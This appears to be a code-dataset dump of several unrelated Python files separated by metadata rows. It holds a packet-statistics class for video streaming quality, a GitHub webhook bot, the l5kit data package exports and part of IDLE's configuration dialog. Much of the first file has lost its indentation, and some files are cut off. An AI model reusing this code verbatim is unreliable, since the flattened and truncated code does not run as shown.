def get_lengths_median(self):
self.stats["Lengths"]["median"] = float(np.median(self.lengths))
def get_times_min(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["min"] = float(pd.Series(self.times).min())
def get_times_max(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["max"] = float(pd.Series(self.times).max())
def get_times_median(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["median"] = float(np.median(self.times))
def collect_stats(self):
# deltas
self.get_deltas_count()
self.get_deltas_mean()
self.get_deltas_std()
self.get_deltas_min()
self.get_deltas_max()
self.get_deltas_variance()
self.get_deltas_variance_coefficient()
self.get_deltas_mode()
self.get_deltas_kurtosis()
self.get_deltas_skewness()
self.get_deltas_median()
# lengths
self.get_lengths_count()
self.get_lengths_mean()
self.get_lengths_std()
self.get_lengths_min()
self.get_lengths_max()
self.get_lengths_variance()
self.get_lengths_variance_coefficient()
self.get_lengths_mode()
self.get_lengths_kurtosis()
self.get_lengths_skewness()
self.get_lengths_median()
# arrival times
self.get_times_min()
self.get_times_max()
self.get_times_median()
def get_stats(self):
self.collect_stats()
return self.stats
    def remove_partner_ips(self, list_of_all_ip_addr):
        """Drop partner addresses in place so that only host ips remain.
        """
        # Iterate over a copy: removing items from the list while iterating
        # over it directly would skip elements.
        for ip in list(list_of_all_ip_addr):
            for _tuple in self.list_of_tuple_src_dst:
                if ip != _tuple[0] and ip != _tuple[1]:
                    list_of_all_ip_addr.remove(ip)
                    break
def get_host_ip(self, list_of_all_ip_addr):
count_0 = 0
count_1 = 0
for _tuple in self.list_of_tuple_src_dst:
if _tuple[1] == list_of_all_ip_addr[0]:
count_0 += 1
elif _tuple[1] == list_of_all_ip_addr[1]:
count_1 += 1
if count_0 > count_1:
host_ip = list_of_all_ip_addr[0]
else:
host_ip = list_of_all_ip_addr[1]
return host_ip
def get_list_of_host_ip(self):
"""removes partner ip addresses from the list of all ip addr --> returns the list of host ip
"""
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
else:
list_of_all_ip_addr.clear()
list_of_all_ip_addr.append(self.get_host_ip(list(self.set_of_all_ip_addr)))
return list_of_all_ip_addr
def get_set_of_all_ip_addr(self):
"""returns a list of all ip addrs
"""
set_of_all_ip_addr = set()
for _tuple in self.list_of_tuple_src_dst:
set_of_all_ip_addr.add(_tuple[0])
set_of_all_ip_addr.add(_tuple[1])
return sorted(list(set_of_all_ip_addr))
def get_list_of_partners(self):
"""returns a list of ip partners
"""
set_of_partner = set()
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] not in list_of_all_ip_addr:
set_of_partner.add(_tuple[0])
if _tuple[1] not in list_of_all_ip_addr:
set_of_partner.add(_tuple[1])
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] != host_ip:
set_of_partner.add(_tuple[0])
if _tuple[1] != host_ip:
set_of_partner.add(_tuple[1])
return list(set_of_partner)
def get_partner_number(self):
return len(self.get_list_of_partners())
def get_communication_number_with_host(self):
"""returns how much connections with the host
"""
counter = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
host_list = list_of_all_ip_addr
for host in host_list:
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] == host or _tuple[1] == host:
counter += 1
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] == host_ip or _tuple[1] == host_ip:
counter += 1
return counter
def get_communication_weight(self, partner_ip, percentage=False):
"""returns percent of the communication between host and the partner_ip --> how much connections with the
partner_ip through the whole connections
"""
communication_host_partnerip_counter = 0
for _tuple in self.list_of_tuple_src_dst:
if (_tuple[0] == partner_ip or _tuple[1] == partner_ip) and (
_tuple[0] in self.get_list_of_host_ip() or _tuple[1] in self.get_list_of_host_ip()):
communication_host_partnerip_counter += 1
if percentage:
return communication_host_partnerip_counter / self.get_communication_number_with_host()
return communication_host_partnerip_counter
def get_list_partner_communication_percent(self):
"""returns a list of tuples --> ip of the partner, how much percent communication with the host
"""
list_of_partners = self.get_list_of_partners()
list_of_tuple_ip_communication_percent = []
for partner in list_of_partners:
list_of_tuple_ip_communication_percent.append((partner, self.get_communication_weight(partner)))
return list_of_tuple_ip_communication_percent
def get_ip_graph(self, directed=True):
if not self.graph_representation:
self.graph_representation = self.build_ip_graph(directed)
return self.graph_representation
def build_ip_graph(self, directed=True):
communication = [(pkt.srcIp, pkt.dstIp) for pkt in self.packets]
counter = collections.Counter(list(communication))
g = nx.DiGraph()
for edge in counter.most_common():
g.add_edge(edge[0][0], edge[0][1], weight=edge[1])
return g
def get_packets_count_by_second(self):
"""returns dictionary: Keys = seconds and values= packets count
"""
mlvideos.normalize_times_from_times(self.times)
times_ = []
for time in self.times:
times_.append(math.floor(time))
dict_ = dict(collections.Counter(times_))
t_dict = {second: 0 for second in range(0, times_[-1] + 1)}
for key, value in dict_.items():
t_dict[key] += value
return t_dict
def get_download_rate_by_second(self):
download_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
download_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
download_length += pkt.length
download_length_kbit = self.byte_to_kbit(Decimal(download_length))
mlvideos.normalize_times_from_times(self.times)
return Decimal((download_length_kbit / self.times[-1]))
def get_total_length_downloaded(self):
download_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
download_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
download_length += pkt.length
return self.byte_to_kbit(Decimal(download_length))
def get_time_dr_dict(self):
list_times = []
list_lengths = []
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
list_times.append(pkt.time)
list_lengths.append(self.byte_to_kbit(pkt.length))
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
list_times.append(pkt.time)
list_lengths.append(self.byte_to_kbit(pkt.length))
mlvideos.normalize_times_from_times(list_times)
        list_times2 = [math.ceil(t) for t in list_times]
        merged_list = list(zip(list_times2, list_lengths))
time_dict = {}
for packet in merged_list:
if time_dict.get(packet[0]) is None:
time_dict[packet[0]] = packet[1]
else:
time_dict[packet[0]] += packet[1]
mlvideos.normalize_times_from_times(self.times)
max_second = math.ceil(self.times[-1])
time_dr_dict = {second: 0 for second in range(0, max_second + 1)}
for key, value in time_dict.items():
time_dr_dict[key] += value
return time_dr_dict
def get_delta_list(self, alpha, bitrate):
buffer = 0
dl = True
play = False
delta_t_list = []
delta_t2_list = []
second_counter = 0
time_dr_dict = self.get_time_dr_dict()
for time, download_rate in time_dr_dict.items():
second_counter += 1 # 1 loop == 1 second
buffer += download_rate / bitrate
if dl and not play and buffer >= alpha:
buffer = max(buffer - 1, 0)
play = True
dl = True
delta_t_list.append(second_counter + (alpha * bitrate / download_rate))
second_counter = 0
# elif play == False and dl == True:
elif buffer == 0 and dl and play:
play = False
dl = True
delta_t2_list.append(second_counter + ((alpha * bitrate) / (bitrate - download_rate)))
second_counter = 0
elif play and dl:
buffer = max(buffer - 1, 0)
return delta_t_list
def get_total_stall_time(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
total_stall_time = 0
for time in delta_t_list[1:]:
total_stall_time += time
return total_stall_time
def get_total_stall_count(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
if delta_t_list:
count = len(delta_t_list) - 1
else:
count = 0
return count
def get_initial_delay(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
if delta_t_list:
initial_delay = delta_t_list[0]
else:
initial_delay = 0
return initial_delay
def get_upload_rate_by_second(self):
upload_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.srcIp in src_list:
upload_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.srcIp == host_ip:
upload_length += pkt.length
upload_length_kbit = self.byte_to_kbit(Decimal(upload_length))
mlvideos.normalize_times_from_times(self.times)
return Decimal((upload_length_kbit / self.times[-1]))
def get_page_load_time_total(self):
return self.get_page_load_time(self.get_total_length_downloaded())
def get_page_load_time_half(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() / 2))
def get_page_load_time_three_quarters(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() * 3 / 4))
def get_page_load_time_quarter(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() / 4))
def get_page_load_time(self, pagesize):
download_length = 0
page_load_time = []
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
if download_length <= pagesize:
download_length += pkt.length
page_load_time.append(pkt.time)
else:
break
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
if download_length <= pagesize:
download_length += pkt.length
page_load_time.append(pkt.time)
else:
break
mlvideos.normalize_times_from_times(page_load_time)
return page_load_time[-1]
def get_features(self) -> dict:
return self.features
def calc_features(self):
self.features = {"Number of packets": self.get_packets_count(),
"Download rate in kbit/s": float(
self.get_download_rate_by_second()),
"Upload rate in kbit/s": float(
self.get_upload_rate_by_second()),
"Length of all packets in kbit": float(
self.get_total_length()),
"Total downloaded length in kbit": float(
self.get_total_length_downloaded()),
"Total Stall time": float(
self.get_total_stall_time(30, 8000)),
"Total Stall number": float(
self.get_total_stall_count(30, 8000)),
"Initial delay": float(self.get_initial_delay(30, 8000)),
"Time needed in second for the total downloaded size":
float(self.get_page_load_time_total()),
"Time needed for the half of the downloaded size":
float(self.get_page_load_time_half()),
"Time needed for the quarter of the downloaded size": float(
self.get_page_load_time_quarter()),
"Time needed for the three quarters of the downloaded size": float(
self.get_page_load_time_three_quarters())
}
@staticmethod
def byte_to_kbit(_byte: Union[int, Decimal]) -> Decimal:
return _byte * 8 / 1000
| 37.646341 | 113 | 0.601138 |
4a25835f0ca4e0e4241eda45c82c17075b38ef8d | 1,242 | py | Python | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | import os
from aiohttp import web
import aiohttp
from gidgethub import routing, sansio
from gidgethub import aiohttp as gh_aiohttp
from . import pull_request
from . import comments
router = routing.Router(pull_request.router, comments.router)
async def test(request):
return web.Response(status=200, text="Hello world!")
async def main(request):
# read the GitHub webhook payload
body = await request.read()
    # our GitHub authentication token
oauth_token = os.environ.get("GH_TOKEN")
# a representation of GitHub webhook event
event = sansio.Event.from_http(request.headers, body)
# instead of mariatta, use your own username
async with aiohttp.ClientSession() as session:
gh = gh_aiohttp.GitHubAPI(session, "barrachri",
oauth_token=oauth_token)
# call the appropriate callback for the event
await router.dispatch(event, gh)
# return a "Success"
return web.Response(status=200)
if __name__ == "__main__":
app = web.Application()
app.router.add_get("/test", test)
app.router.add_post("/", main)
port = os.environ.get("PORT")
if port is not None:
port = int(port)
web.run_app(app, port=port)
| 25.346939 | 61 | 0.683575 |
4a2583daf248e83df871f7da84adf29d792207f6 | 1,023 | py | Python | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | from .combine import get_combined_scenes
from .filter import (
filter_agents_by_frames,
filter_agents_by_labels,
filter_tl_faces_by_frames,
filter_tl_faces_by_status,
get_agent_by_track_id,
)
from .labels import PERCEPTION_LABEL_TO_INDEX, PERCEPTION_LABELS, TL_FACE_LABEL_TO_INDEX, TL_FACE_LABELS
from .local_data_manager import DataManager, LocalDataManager
from .map_api import MapAPI
from .zarr_dataset import AGENT_DTYPE, FRAME_DTYPE, SCENE_DTYPE, TL_FACE_DTYPE, ChunkedDataset
from .zarr_utils import zarr_concat
__all__ = [
"get_combined_scenes",
"DataManager",
"LocalDataManager",
"ChunkedDataset",
"SCENE_DTYPE",
"FRAME_DTYPE",
"AGENT_DTYPE",
"TL_FACE_DTYPE",
"PERCEPTION_LABELS",
"PERCEPTION_LABEL_TO_INDEX",
"filter_agents_by_labels",
"get_agent_by_track_id",
"filter_agents_by_frames",
"filter_tl_faces_by_frames",
"MapAPI",
"zarr_concat",
"TL_FACE_LABEL_TO_INDEX",
"TL_FACE_LABELS",
"filter_tl_faces_by_status",
]
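# Typical import pattern enabled by this package interface (the dataset path
# is illustrative):
# from l5kit.data import LocalDataManager, ChunkedDataset
# dm = LocalDataManager()
# dataset = ChunkedDataset(dm.require("scenes/sample.zarr"))
# dataset.open()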
| 28.416667 | 104 | 0.761486 |
4a25846238f6e1a30ca9529d9a8a8030a24ee8aa | 68,616 | py | Python | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | """IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from tkinter import (Toplevel, Frame, LabelFrame, Listbox, Label, Button,
Entry, Text, Scale, Radiobutton, Checkbutton, Canvas,
StringVar, BooleanVar, IntVar, TRUE, FALSE,
TOP, BOTTOM, RIGHT, LEFT, SOLID, GROOVE, NORMAL, DISABLED,
NONE, BOTH, X, Y, W, E, EW, NS, NSEW, NW,
HORIZONTAL, VERTICAL, ANCHOR, END)
from tkinter.ttk import Scrollbar
import tkinter.colorchooser as tkColorChooser
import tkinter.font as tkFont
import tkinter.messagebox as tkMessageBox
from idlelib.config import idleConf
from idlelib.config_key import GetKeysDialog
from idlelib.dynoption import DynOptionMenu
from idlelib import macosx
from idlelib.query import SectionName, HelpSource
from idlelib.tabbedpages import TabbedPageSet
from idlelib.textview import view_text
class ConfigDialog(Toplevel):
def __init__(self, parent, title='', _htest=False, _utest=False):
"""
_htest - bool, change box location when running htest
_utest - bool, don't wait_window when running unittest
"""
Toplevel.__init__(self, parent)
self.parent = parent
if _htest:
parent.instance_dict = {}
self.withdraw()
self.configure(borderwidth=5)
self.title(title or 'IDLE Preferences')
x = parent.winfo_rootx() + 20
y = parent.winfo_rooty() + (30 if not _htest else 150)
self.geometry(f'+{x}+{y}')
#Theme Elements. Each theme element key is its display name.
#The first value of the tuple is the sample area tag name.
#The second value is the display name list sort index.
self.theme_elements={
'Normal Text': ('normal', '00'),
'Python Keywords': ('keyword', '01'),
'Python Definitions': ('definition', '02'),
'Python Builtins': ('builtin', '03'),
'Python Comments': ('comment', '04'),
'Python Strings': ('string', '05'),
'Selected Text': ('hilite', '06'),
'Found Text': ('hit', '07'),
'Cursor': ('cursor', '08'),
'Editor Breakpoint': ('break', '09'),
'Shell Normal Text': ('console', '10'),
'Shell Error Text': ('error', '11'),
'Shell Stdout Text': ('stdout', '12'),
'Shell Stderr Text': ('stderr', '13'),
}
self.reset_changed_items() #load initial values in changed items dict
self.create_widgets()
self.resizable(height=FALSE, width=FALSE)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.tab_pages.focus_set()
#key bindings for this dialog
#self.bind('<Escape>', self.Cancel) #dismiss dialog, no save
#self.bind('<Alt-a>', self.Apply) #apply changes, save
#self.bind('<F1>', self.Help) #context help
self.load_configs()
self.attach_var_callbacks() #avoid callbacks during load_configs
if not _utest:
self.wm_deiconify()
self.wait_window()
def create_widgets(self):
self.tab_pages = TabbedPageSet(self,
page_names=['Fonts/Tabs', 'Highlighting', 'Keys', 'General',
'Extensions'])
self.tab_pages.pack(side=TOP, expand=TRUE, fill=BOTH)
self.create_page_font_tab()
self.create_page_highlight()
self.create_page_keys()
self.create_page_general()
self.create_page_extensions()
self.create_action_buttons().pack(side=BOTTOM)
def create_action_buttons(self):
if macosx.isAquaTk():
# Changing the default padding on OSX results in unreadable
# text in the buttons
padding_args = {}
else:
padding_args = {'padx':6, 'pady':3}
outer = Frame(self, pady=2)
buttons = Frame(outer, pady=2)
for txt, cmd in (
('Ok', self.ok),
('Apply', self.apply),
('Cancel', self.cancel),
('Help', self.help)):
Button(buttons, text=txt, command=cmd, takefocus=FALSE,
**padding_args).pack(side=LEFT, padx=5)
# add space above buttons
Frame(outer, height=2, borderwidth=0).pack(side=TOP)
buttons.pack(side=BOTTOM)
return outer
def create_page_font_tab(self):
parent = self.parent
self.font_size = StringVar(parent)
self.font_bold = BooleanVar(parent)
self.font_name = StringVar(parent)
self.space_num = IntVar(parent)
self.edit_font = tkFont.Font(parent, ('courier', 10, 'normal'))
##widget creation
#body frame
frame = self.tab_pages.pages['Fonts/Tabs'].frame
#body section frames
frame_font = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Base Editor Font ')
frame_indent = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Indentation Width ')
#frame_font
frame_font_name = Frame(frame_font)
frame_font_param = Frame(frame_font)
font_name_title = Label(
frame_font_name, justify=LEFT, text='Font Face :')
self.list_fonts = Listbox(
frame_font_name, height=5, takefocus=FALSE, exportselection=FALSE)
self.list_fonts.bind(
'<ButtonRelease-1>', self.on_list_fonts_button_release)
scroll_font = Scrollbar(frame_font_name)
scroll_font.config(command=self.list_fonts.yview)
self.list_fonts.config(yscrollcommand=scroll_font.set)
font_size_title = Label(frame_font_param, text='Size :')
self.opt_menu_font_size = DynOptionMenu(
frame_font_param, self.font_size, None, command=self.set_font_sample)
check_font_bold = Checkbutton(
frame_font_param, variable=self.font_bold, onvalue=1,
offvalue=0, text='Bold', command=self.set_font_sample)
frame_font_sample = Frame(frame_font, relief=SOLID, borderwidth=1)
self.font_sample = Label(
frame_font_sample, justify=LEFT, font=self.edit_font,
text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]')
#frame_indent
frame_indent_size = Frame(frame_indent)
indent_size_title = Label(
frame_indent_size, justify=LEFT,
text='Python Standard: 4 Spaces!')
self.scale_indent_size = Scale(
frame_indent_size, variable=self.space_num,
orient='horizontal', tickinterval=2, from_=2, to=16)
#widget packing
#body
frame_font.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_indent.pack(side=LEFT, padx=5, pady=5, fill=Y)
#frame_font
frame_font_name.pack(side=TOP, padx=5, pady=5, fill=X)
frame_font_param.pack(side=TOP, padx=5, pady=5, fill=X)
font_name_title.pack(side=TOP, anchor=W)
self.list_fonts.pack(side=LEFT, expand=TRUE, fill=X)
scroll_font.pack(side=LEFT, fill=Y)
font_size_title.pack(side=LEFT, anchor=W)
self.opt_menu_font_size.pack(side=LEFT, anchor=W)
check_font_bold.pack(side=LEFT, anchor=W, padx=20)
frame_font_sample.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
self.font_sample.pack(expand=TRUE, fill=BOTH)
#frame_indent
frame_indent_size.pack(side=TOP, fill=X)
indent_size_title.pack(side=TOP, anchor=W, padx=5)
self.scale_indent_size.pack(side=TOP, padx=5, fill=X)
return frame
def create_page_highlight(self):
parent = self.parent
self.builtin_theme = StringVar(parent)
self.custom_theme = StringVar(parent)
self.fg_bg_toggle = BooleanVar(parent)
self.colour = StringVar(parent)
self.font_name = StringVar(parent)
self.is_builtin_theme = BooleanVar(parent)
self.highlight_target = StringVar(parent)
##widget creation
#body frame
frame = self.tab_pages.pages['Highlighting'].frame
#body section frames
frame_custom = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Custom Highlighting ')
frame_theme = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Highlighting Theme ')
#frame_custom
self.text_highlight_sample=Text(
frame_custom, relief=SOLID, borderwidth=1,
font=('courier', 12, ''), cursor='hand2', width=21, height=11,
takefocus=FALSE, highlightthickness=0, wrap=NONE)
text=self.text_highlight_sample
text.bind('<Double-Button-1>', lambda e: 'break')
text.bind('<B1-Motion>', lambda e: 'break')
text_and_tags=(
('#you can click here', 'comment'), ('\n', 'normal'),
('#to choose items', 'comment'), ('\n', 'normal'),
('def', 'keyword'), (' ', 'normal'),
('func', 'definition'), ('(param):\n ', 'normal'),
('"""string"""', 'string'), ('\n var0 = ', 'normal'),
("'string'", 'string'), ('\n var1 = ', 'normal'),
("'selected'", 'hilite'), ('\n var2 = ', 'normal'),
("'found'", 'hit'), ('\n var3 = ', 'normal'),
('list', 'builtin'), ('(', 'normal'),
('None', 'keyword'), (')\n', 'normal'),
(' breakpoint("line")', 'break'), ('\n\n', 'normal'),
(' error ', 'error'), (' ', 'normal'),
('cursor |', 'cursor'), ('\n ', 'normal'),
('shell', 'console'), (' ', 'normal'),
('stdout', 'stdout'), (' ', 'normal'),
('stderr', 'stderr'), ('\n', 'normal'))
for texttag in text_and_tags:
text.insert(END, texttag[0], texttag[1])
for element in self.theme_elements:
def tem(event, elem=element):
event.widget.winfo_toplevel().highlight_target.set(elem)
text.tag_bind(
self.theme_elements[element][0], '<ButtonPress-1>', tem)
text.config(state=DISABLED)
self.frame_colour_set = Frame(frame_custom, relief=SOLID, borderwidth=1)
frame_fg_bg_toggle = Frame(frame_custom)
button_set_colour = Button(
self.frame_colour_set, text='Choose Colour for :',
command=self.get_colour, highlightthickness=0)
self.opt_menu_highlight_target = DynOptionMenu(
self.frame_colour_set, self.highlight_target, None,
highlightthickness=0) #, command=self.set_highlight_targetBinding
self.radio_fg = Radiobutton(
frame_fg_bg_toggle, variable=self.fg_bg_toggle, value=1,
text='Foreground', command=self.set_colour_sample_binding)
self.radio_bg=Radiobutton(
frame_fg_bg_toggle, variable=self.fg_bg_toggle, value=0,
text='Background', command=self.set_colour_sample_binding)
self.fg_bg_toggle.set(1)
button_save_custom_theme = Button(
frame_custom, text='Save as New Custom Theme',
command=self.save_as_new_theme)
#frame_theme
theme_type_title = Label(frame_theme, text='Select : ')
self.radio_theme_builtin = Radiobutton(
frame_theme, variable=self.is_builtin_theme, value=1,
command=self.set_theme_type, text='a Built-in Theme')
self.radio_theme_custom = Radiobutton(
frame_theme, variable=self.is_builtin_theme, value=0,
command=self.set_theme_type, text='a Custom Theme')
self.opt_menu_theme_builtin = DynOptionMenu(
frame_theme, self.builtin_theme, None, command=None)
self.opt_menu_theme_custom=DynOptionMenu(
frame_theme, self.custom_theme, None, command=None)
self.button_delete_custom_theme=Button(
frame_theme, text='Delete Custom Theme',
command=self.delete_custom_theme)
self.new_custom_theme = Label(frame_theme, bd=2)
##widget packing
#body
frame_custom.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_theme.pack(side=LEFT, padx=5, pady=5, fill=Y)
#frame_custom
self.frame_colour_set.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=X)
frame_fg_bg_toggle.pack(side=TOP, padx=5, pady=0)
self.text_highlight_sample.pack(
side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
button_set_colour.pack(side=TOP, expand=TRUE, fill=X, padx=8, pady=4)
self.opt_menu_highlight_target.pack(
side=TOP, expand=TRUE, fill=X, padx=8, pady=3)
self.radio_fg.pack(side=LEFT, anchor=E)
self.radio_bg.pack(side=RIGHT, anchor=W)
button_save_custom_theme.pack(side=BOTTOM, fill=X, padx=5, pady=5)
#frame_theme
theme_type_title.pack(side=TOP, anchor=W, padx=5, pady=5)
self.radio_theme_builtin.pack(side=TOP, anchor=W, padx=5)
self.radio_theme_custom.pack(side=TOP, anchor=W, padx=5, pady=2)
self.opt_menu_theme_builtin.pack(side=TOP, fill=X, padx=5, pady=5)
self.opt_menu_theme_custom.pack(side=TOP, fill=X, anchor=W, padx=5, pady=5)
self.button_delete_custom_theme.pack(side=TOP, fill=X, padx=5, pady=5)
self.new_custom_theme.pack(side=TOP, fill=X, pady=5)
return frame
def create_page_keys(self):
parent = self.parent
self.binding_target = StringVar(parent)
self.builtin_keys = StringVar(parent)
self.custom_keys = StringVar(parent)
self.are_keys_builtin = BooleanVar(parent)
self.keybinding = StringVar(parent)
##widget creation
#body frame
frame = self.tab_pages.pages['Keys'].frame
#body section frames
frame_custom = LabelFrame(
frame, borderwidth=2, relief=GROOVE,
text=' Custom Key Bindings ')
frame_key_sets = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Key Set ')
#frame_custom
frame_target = Frame(frame_custom)
target_title = Label(frame_target, text='Action - Key(s)')
scroll_target_y = Scrollbar(frame_target)
scroll_target_x = Scrollbar(frame_target, orient=HORIZONTAL)
self.list_bindings = Listbox(
frame_target, takefocus=FALSE, exportselection=FALSE)
self.list_bindings.bind('<ButtonRelease-1>', self.keybinding_selected)
scroll_target_y.config(command=self.list_bindings.yview)
scroll_target_x.config(command=self.list_bindings.xview)
self.list_bindings.config(yscrollcommand=scroll_target_y.set)
self.list_bindings.config(xscrollcommand=scroll_target_x.set)
self.button_new_keys = Button(
frame_custom, text='Get New Keys for Selection',
command=self.get_new_keys, state=DISABLED)
#frame_key_sets
frames = [Frame(frame_key_sets, padx=2, pady=2, borderwidth=0)
for i in range(2)]
self.radio_keys_builtin = Radiobutton(
frames[0], variable=self.are_keys_builtin, value=1,
command=self.set_keys_type, text='Use a Built-in Key Set')
self.radio_keys_custom = Radiobutton(
frames[0], variable=self.are_keys_builtin, value=0,
command=self.set_keys_type, text='Use a Custom Key Set')
self.opt_menu_keys_builtin = DynOptionMenu(
frames[0], self.builtin_keys, None, command=None)
self.opt_menu_keys_custom = DynOptionMenu(
frames[0], self.custom_keys, None, command=None)
self.button_delete_custom_keys = Button(
frames[1], text='Delete Custom Key Set',
command=self.delete_custom_keys)
button_save_custom_keys = Button(
frames[1], text='Save as New Custom Key Set',
command=self.save_as_new_key_set)
self.new_custom_keys = Label(frames[0], bd=2)
##widget packing
#body
frame_custom.pack(side=BOTTOM, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_key_sets.pack(side=BOTTOM, padx=5, pady=5, fill=BOTH)
#frame_custom
self.button_new_keys.pack(side=BOTTOM, fill=X, padx=5, pady=5)
frame_target.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
#frame target
frame_target.columnconfigure(0, weight=1)
frame_target.rowconfigure(1, weight=1)
target_title.grid(row=0, column=0, columnspan=2, sticky=W)
self.list_bindings.grid(row=1, column=0, sticky=NSEW)
scroll_target_y.grid(row=1, column=1, sticky=NS)
scroll_target_x.grid(row=2, column=0, sticky=EW)
#frame_key_sets
self.radio_keys_builtin.grid(row=0, column=0, sticky=W+NS)
self.radio_keys_custom.grid(row=1, column=0, sticky=W+NS)
self.opt_menu_keys_builtin.grid(row=0, column=1, sticky=NSEW)
self.opt_menu_keys_custom.grid(row=1, column=1, sticky=NSEW)
self.new_custom_keys.grid(row=0, column=2, sticky=NSEW, padx=5, pady=5)
self.button_delete_custom_keys.pack(side=LEFT, fill=X, expand=True, padx=2)
button_save_custom_keys.pack(side=LEFT, fill=X, expand=True, padx=2)
frames[0].pack(side=TOP, fill=BOTH, expand=True)
frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
return frame
def create_page_general(self):
parent = self.parent
self.win_width = StringVar(parent)
self.win_height = StringVar(parent)
self.startup_edit = IntVar(parent)
self.autosave = IntVar(parent)
self.encoding = StringVar(parent)
self.user_help_browser = BooleanVar(parent)
self.help_browser = StringVar(parent)
#widget creation
#body
frame = self.tab_pages.pages['General'].frame
#body section frames
frame_run = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Startup Preferences ')
frame_save = LabelFrame(frame, borderwidth=2, relief=GROOVE,
                                text=' Autosave Preferences ')
frame_win_size = Frame(frame, borderwidth=2, relief=GROOVE)
frame_help = LabelFrame(frame, borderwidth=2, relief=GROOVE,
